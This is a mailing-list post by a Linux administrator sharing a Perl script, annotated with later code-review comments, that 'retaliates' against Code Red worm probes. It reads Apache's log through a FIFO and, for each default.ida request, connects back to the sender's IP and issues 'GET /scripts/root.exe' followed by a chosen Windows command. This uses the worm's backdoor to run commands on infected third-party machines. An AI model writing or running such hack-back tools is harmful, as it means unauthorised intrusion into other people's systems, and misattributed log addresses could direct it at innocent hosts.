So creating a fifo for apache to write its access log to and a script
like this would be a faux pas then?...

 -Max

#!/usr/bin/perl
#
# Script to retaliate against Code Red Attacks.
# The author is not responsible for how you use this educational script.

use Socket;

# All configuration lives in package globals (the script has no `use strict`);
# the subs below read these names directly instead of taking arguments.
$fifo = "/var/log/apache/apache.fifo";        # named pipe Apache writes its access log into
$httplogfile = "/var/log/apache/access.log";  # httplog() re-materialises the access log here
$wormlogfile = "/var/log/apache/codered.log"; # logit()/attack_failed() record hits here

# The command you want to run on the compromised machine.
$win_command = "";

#
# Shouldn't need to do anything below here
#

# Two-arg open of a constant path.  Opening a FIFO for reading normally
# blocks until a writer (Apache) has opened the other end.
open (FILE, "<".$fifo) or die "cant open fifo";

# Intended to read forever.  Once the writer side closes, <FILE> keeps
# returning EOF immediately and this outer loop spins at full CPU without
# ever reopening the FIFO -- presumably meant to survive an Apache restart,
# but it does not; confirm the intended behaviour.
# Also note that nothing in this loop has a timeout: attack() below does a
# blocking connect(), so one unreachable peer stalls this reader, and with a
# FIFO as its only sink Apache's own log writes will presumably stall too.
while (1){
 while (<FILE>){
  # `&sub;` with no parens passes the caller's @_ (empty here); each sub
  # reads the current line from the global $_.
  &httplog;
  # Unanchored match with an unescaped `.`, so "defaultXida" matches as well.
  if ($_ =~ m/default.ida/){
   # First whitespace-separated field of the log line -- the peer address
   # under the default LogFormat; a proxy in front would put its own address
   # here (depends on the configured format -- verify).
   $ip = ((split " ", $_)[0]);
   &logit;
   # BUG: `=` is assignment, not `eq`, so this condition is always true and
   # attack() runs for every default.ida hit, whatever logit() put in
   # $version.
   if ($version = "2/3"){ &attack };
  } 
 }
}

# Will never get here
close FILE;
exit 0;

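sub httplog {
    # Append the current access-log line to $httplogfile, re-creating the
    # ordinary Apache log that would otherwise disappear into the FIFO.
    #
    # Reads the globals $_ (the line just read from the FIFO) and
    # $httplogfile.  Dies if the file cannot be opened or the buffered write
    # cannot be flushed at close.  Dying here ends the FIFO reader, so the
    # writer on the other end loses its sink.
    open my $log, '>>', $httplogfile
        or die "cant open http logfile: $!";
    print {$log} $_;
    # Append errors (a full disk, for instance) only surface at close time.
    close $log or die "cant close http logfile: $!";
    return;
}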

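sub logit {
    # Record a default.ida hit in $wormlogfile and classify the worm variant.
    #
    # Reads the globals $_ (the access-log line that matched), $ip (its first
    # field, set by the caller) and $wormlogfile.  Sets the global $version,
    # which the main loop inspects afterwards:
    #   "2/3" - the line contains the script's XXXXXX marker
    #   "1"   - the line contains the NNNNNN marker
    #   "?"   - neither marker is present
    # Dies if the log file cannot be opened or flushed.

    # Fourth whitespace-separated field -- presumably the
    # "[dd/Mon/yyyy:hh:mm:ss" half of the timestamp in Apache common-format
    # lines, which is why a lone "]" is printed at the end; verify against
    # the configured LogFormat.
    my $date = (split ' ', $_)[3];

    # if/elsif/else so a line carrying XXXXXX is not reclassified as "?"
    # (the original's second stand-alone `if ... else` did exactly that).
    if ($_ =~ m/XXXXXX/) {
        $version = "2/3";
    }
    elsif ($_ =~ m/NNNNNN/) {
        $version = "1";
    }
    else {
        $version = "?";
    }

    open my $log, '>>', $wormlogfile
        or die "cant open logfile: $!";
    print {$log} $date, " - ", $ip, " v", $version, "]\n";
    # Append errors only surface at close time.
    close $log or die "cant close logfile: $!";
    return;
}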

sub attack {
# Attack compromised machine
# Opens a TCP connection to port 80 of the global $ip (the first field of the
# matching log line, set by the main loop) and writes two lines to it;
# nothing is read back.  Every step below is unchecked and nothing has a
# timeout, so a peer that silently drops the connection attempt holds this
# sub -- and with it the whole FIFO reader -- for the kernel's full connect
# timeout.
# `local` on an undeclared name creates a dynamically scoped package global,
# not a lexical; `my` is presumably what was meant (same for $sin below).
local $proto = getprotobyname('tcp');
# Bareword handle; return value ignored.
socket(osock, PF_INET, SOCK_STREAM, $proto);
# inet_aton() returns undef for an unparsable or unresolvable name and does
# a blocking DNS lookup if the log field is a hostname rather than a dotted
# quad; neither case is handled here.
local $sin = sockaddr_in(80, inet_aton($ip));
# attack_failed() only logs; it does not return out of this sub, so after a
# failed connect the two prints below still run against the unconnected
# socket (their failures are discarded as well).
connect(osock,$sin) or &attack_failed;
print osock "GET /scripts/root.exe HTTP/1.0 \n";
print osock $win_command,"\n";
close (osock);
}

sub attack_failed {
# If Attack Fails
# Called when connect() to $ip fails; appends one line to $wormlogfile
# noting the failure.  Reads the globals $ip and $wormlogfile; the return
# value is not used by the caller.
open LOGFILE, ">>$wormlogfile" or die "cant open logfile";
print LOGFILE "$ip - ATTACK FAILED\n";
close LOGFILE;
}


-- 
Max Lock, Senior Linux Systems Administrator, TELE2 Mission Control UK. 

Linux like wigwam. No windows, no gates, Apache inside.
